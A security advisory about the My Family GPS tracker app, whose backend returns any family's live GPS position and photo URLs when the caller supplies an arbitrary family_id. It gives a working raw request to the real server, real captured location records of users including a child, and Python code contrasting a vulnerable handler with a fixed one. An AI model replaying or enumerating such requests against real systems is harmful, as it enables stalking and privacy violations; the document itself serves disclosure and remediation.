SIK-2017-012


Title:

My Family GPS tracker data accessible to public

Report ID

SIK-2017-012

Summary:

  • Vendor / package name: net.prtm.myfamily
  • Product: My Family
  • Affected Version: 5.27 (probably all versions)
  • Severity: Private data exposed to the public
  • Short summary: Current location data and, in some cases, profile photos of any user can be read with a single HTTP request

Details:

The backend of the app returns GPS data and the URLs of profile photos without an authorization check: the server does not verify that the caller belongs to the family whose data is requested, so everybody can read the GPS coordinates and photos of all users. Example request:

POST /api HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 164
Host: 52.50.25.155
Connection: close
User-Agent: okhttp/3.3.0

request=%7B%22method%22%3A%22SyncLocation%22%2C%22options%22%3A%7B%22family_id%22%3A650759%7D%2C%22uid%22%3A%22ADM-59b41139c1c64b8430%3A85%3Aa9%3Adf%3A5f%3Aeb%22%7D

family_id: a plain integer (650759 in the example). Substituting any other value returns that family's data; nothing ties the requested family to the uid sent in the request. Example responses (each entry is one family member; "time" is a Unix timestamp in milliseconds):

{"code":204,"response":[{"pid":"919081","name":"","avatar":"0","avatar_img":"","is_history":"1","is_child":"0","battary":"16","position":{"lat":"54.737669","lng":"20.497225","accuracy":"22","time":"1493228407321","provider":"fused","satellites":"0"},"is_location":0}]}

{"code":204,"response":[{"pid":"918111","name":"\u0421","avatar":"0","avatar_img":"","is_history":"1","is_child":"0","battary":"9","position":{"lat":"55.669682","lng":"37.536886","accuracy":"23","time":"1493221696994","provider":"fused","satellites":"0"},"is_location":0},{"pid":"918112","name":"","avatar":"0","avatar_img":"","is_history":"1","is_child":"0","battary":"15","position":{"lat":"55.403762","lng":"37.490915","accuracy":"116","time":"1493215759975","provider":"fused","satellites":"0"},"is_location":0}]}

{"code":204,"response":[{"pid":"918161","name":"LENOVO A3300","avatar":"43","avatar_img":"","is_history":"1","is_child":"0","battary":"10","position":{"lat":"49.660140","lng":"32.023471","accuracy":"23","time":"1493215276616","provider":"fused","satellites":"0"},"is_location":0},{"pid":"918331","name":"Nomi i3050","avatar":"42","avatar_img":"","is_history":"1","is_child":"1","battary":"11","position":{"lat":"49.601861","lng":"31.925968","accuracy":"3586","time":"1493216787322","provider":"fused","satellites":"0"},"is_location":0}]}

Example response including profile picture URLs (hosted on an S3 website endpoint):

{"code":204,"response":[{"pid":"358721","name":"\u0412\u043e\u0441\u044f","avatar":"37","avatar_img":"http:\/\/bestmyfamily.s3-website-eu-west-1.amazonaws.com\/photos\/3c\/3c73f50d4211f6e18be3d7567862950e-7.jpg","is_history":"1","is_child":"0","battary":"90","position":{"lat":"61.103364","lng":"72.582623","accuracy":"22","time":"1493222885412","provider":"network","satellites":"0"},"is_location":0},{"pid":"869397","name":"\u0412\u0435\u0440\u0430","avatar":"0","avatar_img":"http:\/\/bestmyfamily.s3-website-eu-west-1.amazonaws.com\/photos\/d9\/d9a000d78092aff0f4c2b2d041380529-9.jpg","is_history":"1","is_child":"0","battary":"81","position":{"lat":"61.103605","lng":"72.582713","accuracy":"1","time":"1493230492000","provider":"fused","satellites":"0"},"is_location":0}]}
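To make the exposure concrete, the following added example (not code from the advisory author or the vendor) decodes the captured request body and the captured response shown above and flattens the fields a caller learns about each family member. It works only on the strings copied from this report and sends nothing over the network; the function names and the summary layout are this example's own.

```python
import json
from datetime import datetime, timezone
from urllib.parse import parse_qs

# Request body exactly as captured in the advisory (form-encoded JSON).
CAPTURED_BODY = (
    "request=%7B%22method%22%3A%22SyncLocation%22%2C%22options%22%3A"
    "%7B%22family_id%22%3A650759%7D%2C%22uid%22%3A%22ADM-59b41139c1c64b8430"
    "%3A85%3Aa9%3Adf%3A5f%3Aeb%22%7D"
)

# The advisory's response that carries profile-photo URLs, verbatim.
CAPTURED_RESPONSE = r'{"code":204,"response":[{"pid":"358721","name":"\u0412\u043e\u0441\u044f","avatar":"37","avatar_img":"http:\/\/bestmyfamily.s3-website-eu-west-1.amazonaws.com\/photos\/3c\/3c73f50d4211f6e18be3d7567862950e-7.jpg","is_history":"1","is_child":"0","battary":"90","position":{"lat":"61.103364","lng":"72.582623","accuracy":"22","time":"1493222885412","provider":"network","satellites":"0"},"is_location":0},{"pid":"869397","name":"\u0412\u0435\u0440\u0430","avatar":"0","avatar_img":"http:\/\/bestmyfamily.s3-website-eu-west-1.amazonaws.com\/photos\/d9\/d9a000d78092aff0f4c2b2d041380529-9.jpg","is_history":"1","is_child":"0","battary":"81","position":{"lat":"61.103605","lng":"72.582713","accuracy":"1","time":"1493230492000","provider":"fused","satellites":"0"},"is_location":0}]}'


def decode_request(body):
    """Recover the JSON command from the form-encoded 'request=<json>' body."""
    fields = parse_qs(body, strict_parsing=True)
    return json.loads(fields["request"][0])


def extract_exposure(raw):
    """Flatten what a caller learns about every member listed in a response."""
    payload = json.loads(raw)
    members = []
    for m in payload["response"]:
        pos = m["position"]
        # "time" is epoch milliseconds; convert to a readable UTC timestamp.
        seen = datetime.fromtimestamp(int(pos["time"]) / 1000, tz=timezone.utc)
        members.append({
            "pid": m["pid"],
            "name": m["name"],
            "lat": float(pos["lat"]),
            "lng": float(pos["lng"]),
            "accuracy_m": int(pos["accuracy"]),
            "seen_at": seen.isoformat(timespec="seconds"),
            "is_child": m["is_child"] == "1",
            "battery_pct": int(m["battary"]),   # the API's own (misspelt) field name
            "photo_url": m["avatar_img"] or None,
        })
    return members


def summarise(members):
    """Counts an analyst would report for one family: members, children, photos, precise fixes."""
    return {
        "members": len(members),
        "children": sum(1 for m in members if m["is_child"]),
        "photos": sum(1 for m in members if m["photo_url"]),
        # GPS accuracy of 50 m or better counts as a precise fix (threshold chosen for this example).
        "precise_fixes": sum(1 for m in members if m["accuracy_m"] <= 50),
    }
```

Running extract_exposure on the captured response yields two members with positions accurate to 22 m and 1 m, both seen on 2017-04-26 UTC (the day the vulnerability was found), each with a photo URL. The "time" field is what makes this more than a one-off leak: the server hands out a timestamped last-known position, so repeated requests give a movement history.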

Workaround

None available.

Suggested Mitigation

The backend should always check whether the requesting user is authorized to receive the data being requested. Backends should never trust incoming requests and should assume that all data received from the client may have been forged or manipulated. In the concrete case, this means that the request should carry a means of identifying the current user (e.g., a session token issued at login, not a client-chosen identifier) and that the server should check whether the requested family ID is actually associated with the user to whom the token belongs. If the user requests data for a different family ID, the request should be denied.
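The following added example (not the vendor's code) shows the vulnerable handler pattern beside a fixed one that performs the check described above. The in-memory session, membership and location tables, the user names and the HTTP-style status mapping are assumptions made for the example; a real backend would resolve the token and the membership from its database.

```python
import secrets

# Constructed in-memory stand-ins for the backend's database (example data only).
SESSIONS = {}                                    # session token -> user id
FAMILY_MEMBERS = {650759: {"alice", "bob"},       # family_id -> member user ids
                  650760: {"carol"}}
LOCATIONS = {                                     # family_id -> last known member positions
    650759: [{"pid": "919081", "lat": 54.737669, "lng": 20.497225}],
    650760: [{"pid": "918111", "lat": 55.669682, "lng": 37.536886}],
}


class Unauthorized(Exception):
    """No valid session token was presented."""


class Forbidden(Exception):
    """The session is valid but the user is not a member of the requested family."""


def login(user_id):
    """Issue an unguessable session token bound to a user (replaces the client-chosen uid)."""
    token = secrets.token_urlsafe(32)
    SESSIONS[token] = user_id
    return token


def sync_location_vulnerable(request):
    """The pattern the advisory describes: family_id comes from the client and is trusted."""
    return LOCATIONS.get(request["options"]["family_id"], [])


def sync_location_fixed(request, session_token):
    """Authenticate the caller, then authorise the specific family_id being requested."""
    user = SESSIONS.get(session_token)
    if user is None:
        raise Unauthorized()
    family_id = request["options"]["family_id"]
    # Unknown families are denied with the same error as foreign ones, so the
    # response does not reveal which IDs exist (a design choice of this example).
    if user not in FAMILY_MEMBERS.get(family_id, set()):
        raise Forbidden()
    return LOCATIONS[family_id]


def handle(request, session_token):
    """Map the outcome to an HTTP-style status and body, as the API front end would."""
    try:
        return 200, {"response": sync_location_fixed(request, session_token)}
    except Unauthorized:
        return 401, {"error": "authentication required"}
    except Forbidden:
        return 403, {"error": "not a member of this family"}
```

The important detail is the order of checks: the token establishes who is asking, and only then is the family_id from the request compared against that user's memberships. Validating the token alone would still let any logged-in user read every family.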

Timeline

  • 2017-04-26: Vulnerability found
  • 2017-05-18: Reported
  • 2018-08-11: Published